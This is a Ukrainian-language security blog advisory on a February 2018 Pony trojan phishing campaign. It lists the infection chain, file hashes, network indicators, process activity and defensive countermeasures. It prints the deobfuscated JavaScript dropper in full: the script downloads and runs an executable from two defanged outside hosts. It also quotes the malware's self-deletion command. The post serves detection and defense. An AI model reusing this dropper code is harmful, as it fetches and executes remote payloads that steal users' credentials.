IOC_pony_270218

Доброго ранку, панове.

Вчора в першій половині дня було зафіксовано розсилку троянського коду типу Pony.

Рівень загрози – середній. Для тих, хто врахував наші рекомендації стосовно обробки скриптів (WSH) – низький.

Користувачі захисту кінцевих точок McAfee зверніть увагу – dropper та payload детектуються по GTI/DAT.

Трохи аналітики:

  • Доставка – через обфусковані JS скрипти оболонці .lzh (насправді RAR v4)
  • Скрипт містить дві адреси, а основна частина записується з довільним іменем файлу
  • Завантаження основної частини відбувається засобами WSCript.exe
  • Запуск шкідливого коду не потребує прав Адміністратора
  • Даний тип ШПЗ застосовується для збору інформації та крадіжки облікових даних

 

Схема атаки:

email > Attach (LZH) > JS > WSCRIPT > 2 hardcoded URL > GET > AppData\Roaming\Microsoft\Windows\Templates\123456.exe (752787.exe; 909515.exe)

 

#Маркери по файлам, IOC:

 

Приєднання (архів):

SHA-256    874851b1f11a7ab9d1219293eaad0f975afb1555a49fbfbf43061f5f50758446
File name   Заявка февраль.lzh
File size      3.41 KB

 

скрипт приманка:

SHA-256        05b2ce6671cdbe5985dec10b6d09e0413111ff6cc026d70578048aee4e9bd5a6
File name   Заявка февраль.js
File size      14.83 KB

деобфускований скрипт:

dropper_script: var wsh = new ActiveXObject(“wscript.shell”); var path = wsh.SpecialFolders(“templates”)+”\\”+((Math.random()*999999)+9999|0)+”.exe“; try { var HTTP = new ActiveXObject(“MSXML2.XMLHTTP”); var sh = new ActiveXObject(“shell.application”); var Stream = new ActiveXObject(“ADODB.Stream”); HTTP.Open(“GET”, “h11p:\blogprinter{.} net/wp-content/uploads/2018/02/Plink.exe“, false); HTTP.Send(); if (HTTP.Status == 200) { Stream.Open(); Stream.Type = 1; Stream.Write(HTTP.ResponseBody); Stream.Position = 0; Stream.SaveToFile(path, 2); Stream.Close(); sh.ShellExecute(path, “”, “”, “open”, 1); } else { HTTP.Open(“GET”, “h11p:\ford-alarm-motors{.} ru/new/Plink.exe“, false); HTTP.Send(); if (HTTP.Status == 200) { Stream.Open(); Stream.Type = 1; Stream.Write(HTTP.ResponseBody); Stream.Position = 0; Stream.SaveToFile(path, 2); Stream.Close(); sh.ShellExecute(path, “”, “”, “open”, 1); } }} catch(e) {}

основна частина:

SHA-256        78dae10762c946ce16b00cecdc2b2d94269892638870ea7a16f492c247b53f57l
File name   Plink.exe >> AppData\Roaming\Microsoft\Windows\Templates\(random_6).exe (752787.exe 909515.exe)
File size      60 KB

 

DLL:

SHA-256    8df388d10a92699f190808e81a35a3afdd50ab1d9afca418f6142d4cc3cfcde8
File name   fhmivfb.dll >> AppData\Roaming\zxponrg.dll
File size      105.5 KB

 

#Мережеві IOC:

завантаження payload – станом на 10ту ранку 28/02/18 досі активні!

107.150.61.242   HTTP 391   blogprinter{.} net   GET /wp-content/uploads/2018/02/Plink.exe HTTP/1.1

або

87.242.73.90      HTTP 299   ford-alarm-motors{.} ru  GET /new/Plink.exe HTTP/1.1

 

трафік скомпрометованої системи – сервер контролю

88.119.179.237   HTTP 420   toolbarqueries{.} google.com GET http://toolbarqueries.google{.} com/search?sourceid=navclient-ff&features=Rank&client=navclient-auto-ff&ch=
87.120.37.42      HTTP 1342 gmail{.} com      POST http://gmail{.} com/upload.php HTTP/1.1  (JPEG JFIF image)[Malformed Packet]
185.99.132.113   HTTP 564   185.99.132.113   POST /g/g.php HTTP/1.0
185.99.132.113   HTTP 1355 gmail{.} com      POST http://gmail{.} com/upload.php HTTP/1.1  (JPEG JFIF image)

ситауція по вілдкритим портам після закріплення:

264837.exe 1416 TCP 10.0.2.15 53121 87.120.37.42 80 ESTABLISHED 
rundll32.exe 988 TCP 10.0.2.15 53117 54.236.38.98 53 SYN_SENT 
[System Process] 0 TCP 10.0.2.15 53118 87.120.37.42 80 TIME_WAIT 
[System Process] 0 TCP 10.0.2.15 49406 87.120.37.42 80 TIME_WAIT 
[System Process] 0 TCP 10.0.2.15 49405 87.120.37.42 80 TIME_WAIT 
[System Process] 0 TCP 10.0.2.15 49403 87.120.37.42 80 TIME_WAIT 
[System Process] 0 TCP 10.0.2.15 49402 87.120.37.42 80 TIME_WAIT 
[System Process] 0 TCP 10.0.2.15 49399 88.119.179.237 80 TIME_WAIT 
[System Process] 0 TCP 10.0.2.15 49407 87.120.37.42 80 TIME_WAIT

#Активність по процесам:

Запуск скрипта-приманки ініціює завантаження основної частини засобами WSCript:

 

"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\Заявка февраль.js"

"C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\264837.exe"

 

Закріплення через розпаковану DLL:

 

C:\Windows\SysWOW64\rundll32.exe  rundll32 "C:\Users\operator\AppData\Roaming\zxponrg.dll",SVCServiceMain uzgmelroj INS2

uzgmelroj                   c:\users\operator\appdata\roaming\zxponrg.dll        18.02.2018 22:06        19/67

"C:\Windows\SysWOW64\svchost.exe"

 

Самознищення із затримкою після передачі даних:

"C:\Windows\system32\cmd.exe" /c ping -n 1 127.0.0.1 && del "C:\Users\operator\AppData\Roaming\MICROS~1\Windows\TEMPLA~1\264837.exe" >> NUL

ping  -n 1 127.0.0.1

 

#Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Блокування доступу до мережі Інтернет для процесу WSCript та CSCript (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !

Користуючись нагодою, нагадую що ENS 10.5 має вбудоване правило для обмеження запуску скриптів, але воно не активоване по замовчуванню:

Або ж можна створити власне правило із такою умовою:

  • Посилена фільтрація запускних та скриптових файлів по каналам Web та Email
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

Tags: , , , , , , ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: